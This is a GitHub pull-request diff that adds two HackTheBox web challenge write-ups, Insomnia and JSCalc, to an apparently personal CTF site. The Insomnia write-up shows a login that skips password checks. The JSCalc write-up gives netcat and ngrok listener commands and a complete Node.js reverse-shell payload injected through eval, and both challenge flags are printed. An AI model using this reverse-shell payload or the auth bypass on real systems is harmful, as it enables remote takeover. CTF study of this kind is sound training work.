Skip to content

publish #22

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Apr 25, 2024
Merged

publish #22

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
47 changes: 47 additions & 0 deletions index.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,52 @@ layout: default

<h1>News</h1>

<hr>
<article>
<div style="display: flex;">
<div style="flex: 1">
<center>
<img width="400em" src="data:image/png;base64,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" alt="">
</center>
</div>
<div style="flex: 1">
<h2>HackTheBox - Insomnia - Writeup</h2>
<p>A new writeup for HackTheBox - Insomnia is now Available.</p>

<center>
<a href="{{'/pages/writeups/hackthebox/challenges/insomnia/insomnia'}}" class="btn">Check it Out</a>
</center>

<br>
<small>25 Apr 2024</small>
</div>
</div>
</article>


<hr>
<article>
<div style="display: flex;">
<div style="flex: 1">
<center>
<img width="400em" src="data:image/png;base64,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" alt="">
</center>
</div>
<div style="flex: 1">
<h2>HackTheBox - JSCalc - Writeup</h2>
<p>A new writeup for HackTheBox - JSCalc is now Available.</p>

<center>
<a href="{{'/pages/writeups/hackthebox/challenges/jscalc/jscalc'}}" class="btn">Check it Out</a>
</center>

<br>
<small>25 Apr 2024</small>
</div>
</div>
</article>


<hr>
<article>
<div style="display: flex;">
Expand All @@ -26,6 +72,7 @@ layout: default
</div>
</article>

<hr>
<article>
<div style="display: flex;">
<div style="flex: 1">
Expand Down
16 changes: 16 additions & 0 deletions pages/writeups.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -13,6 +13,22 @@ layout: default
<th scope="col">Writeup</th>
</thead>
<tbody>
<tr>
<td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
<td>Web</td>
<td>Insomnia</td>
<td class="d-flex justify-content-center">
<a href="{{'/pages/writeups/hackthebox/challenges/insomnia/insomnia'}}" class="btn">Read</a>
</td>
</tr>
<tr>
<td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
<td>Web</td>
<td>JSCalc</td>
<td class="d-flex justify-content-center">
<a href="{{'/pages/writeups/hackthebox/challenges/jscalc/jscalc'}}" class="btn">Read</a>
</td>
</tr>
<tr>
<td><a href="https://www.hackthebox.com/">HackTheBox</a></td>
<td>Web</td>
Expand Down
3 changes: 1 addition & 2 deletions pages/writeups/hackthebox/challenges/PDFy/pdfy.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,10 +1,9 @@
---
layout: post
author: k0d14k
title: HackTheBox - PDFy (web)
---

# HackTheBox - PDFy

---

Tags: `SSRF`, **`CVE-2022-35583`, `localhost.run`**
Expand Down
Binary file added pages/writeups/hackthebox/challenges/insomnia/Untitled 1.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added pages/writeups/hackthebox/challenges/insomnia/Untitled 2.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added pages/writeups/hackthebox/challenges/insomnia/Untitled.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
111 changes: 111 additions & 0 deletions pages/writeups/hackthebox/challenges/insomnia/insomnia.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,111 @@
---
layout: post
author: k0d14k
title: HackTheBox - Insomnia (web)
---

---

Tags: `JSON Password Bypass`

---

> Welcome back to Insomnia Factory, where you might have to work under the enchanting glow of the moon, crafting dreams and weaving sleepless tales.
>

In this web challenge provided by Hack the Box, We have a register/login form.

![Untitled](Untitled.png)

The starting page doesn’t give us any information so We could take a look at the source code provided with the challenge.

```php
<?php

namespace App\Controllers;

use App\Controllers\BaseController;
use CodeIgniter\HTTP\ResponseInterface;
use Config\Paths;
use Firebase\JWT\JWT;
use Firebase\JWT\Key;

class ProfileController extends BaseController
{
public function index()
{
$token = (string) $_COOKIE["token"] ?? null;
$flag = file_get_contents(APPPATH . "/../flag.txt");
if (isset($token)) {
$key = (string) getenv("JWT_SECRET");
$jwt_decode = JWT::decode($token, new Key($key, "HS256"));
$username = $jwt_decode->username;
if ($username == "administrator") {
return view("ProfilePage", [
"username" => $username,
"content" => $flag,
]);
} else {
$content = "Haven't seen you for a while";
return view("ProfilePage", [
"username" => $username,
"content" => $content,
]);
}
}
}
}

```

Reading the code We got the `ProfileController` class. In this class, We noticed that to get the flag, We have to log in as `administrator`.

Let’s take a look at the login functionality to see if there is a security issue in the login implementation. Spoiler, it is.

```php
public function login()
{
$db = db_connect();
$json_data = request()->getJSON(true);
if (!count($json_data) == 2) {
return $this->respond("Please provide username and password", 404);
}
**$query = $db->table("users")->getWhere($js**on_data, 1, 0);
$result = $query->getRowArray();
if (!$result) {
return $this->respond("User not found", 404);
} else {
$key = (string) getenv("JWT_SECRET");
$iat = time();
$exp = $iat + 36000;
$headers = [
"alg" => "HS256",
"typ" => "JWT",
];
$payload = [
"iat" => $iat,
"exp" => $exp,
"username" => $result["username"],
];
$token = JWT::encode($payload, $key, "HS256");

$response = [
"message" => "Login Succesful",
"token" => $token,
];
return $this->respond($response, 200);
}
}
```

Reading the code, We notice that once the username is provided, se server just asserts that a user with that username exists. But it’s not checking the password.

![Untitled](Untitled%201.png)

There We go, now We have a valid cookie for the admin. Let’s use it to get the profile.

![Untitled](Untitled%202.png)

---

## Flag: HTB{I_just_want_to_sleep_a_little_bit!!!!!}
Binary file added pages/writeups/hackthebox/challenges/jscalc/Untitled 1.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added pages/writeups/hackthebox/challenges/jscalc/Untitled 2.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added pages/writeups/hackthebox/challenges/jscalc/Untitled.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
58 changes: 58 additions & 0 deletions pages/writeups/hackthebox/challenges/jscalc/jscalc.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,58 @@
---
layout: post
author: k0d14k
title: HackTheBox - jscalc (web)
---

---

Tags: `NodeJS RCE`

---

> In the mysterious depths of the digital sea, a specialized JavaScript calculator has been crafted by tech-savvy squids. With multiple arms and complex problem-solving skills, these cephalopod engineers use it for everything from inkjet trajectory calculations to deep-sea math. Attempt to outsmart it at your own risk! 🦑
>

In this challenge, We have a NodeJS calculator.

Our focus is to get the flag saved in `/flag.txt`.

Reading the code We notice that, to provide the expression result, the server uses the `eval` function as follows:

![Untitled](Untitled.png)

This is an easy RCE (Remote Code Execution). We should be able to establish a reverse shell using `netcat` and `ngrok`.

In a terminal run:

```bash
nc -nvlp 1234
```

while in a second one run:

```bash
ngrok tcp 1234
```

Now, We can generate a reverse shell using [RevShells](https://www.revshells.com/).

There is just one thing you need to consider, the `calculate` function the `eval` is evaluating a function that returns our `formula`. So to correctly bind our reverse shell We need to wrap our reverse shell in a function.

Our final payload is:

```jsx
(function() {var net = require("net"), cp = require("child_process"), sh = cp.spawn("sh", []); var client = new net.Socket(); client.connect([port], "[ngrok tcp dns]", function(){client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/;;}())
```

And there We go:

![Untitled](Untitled%201.png)

And in our terminal:

![Untitled](Untitled%202.png)

---

## Flag: HTB{c4lcul4t3d_my_w4y_thr0ugh_rc3}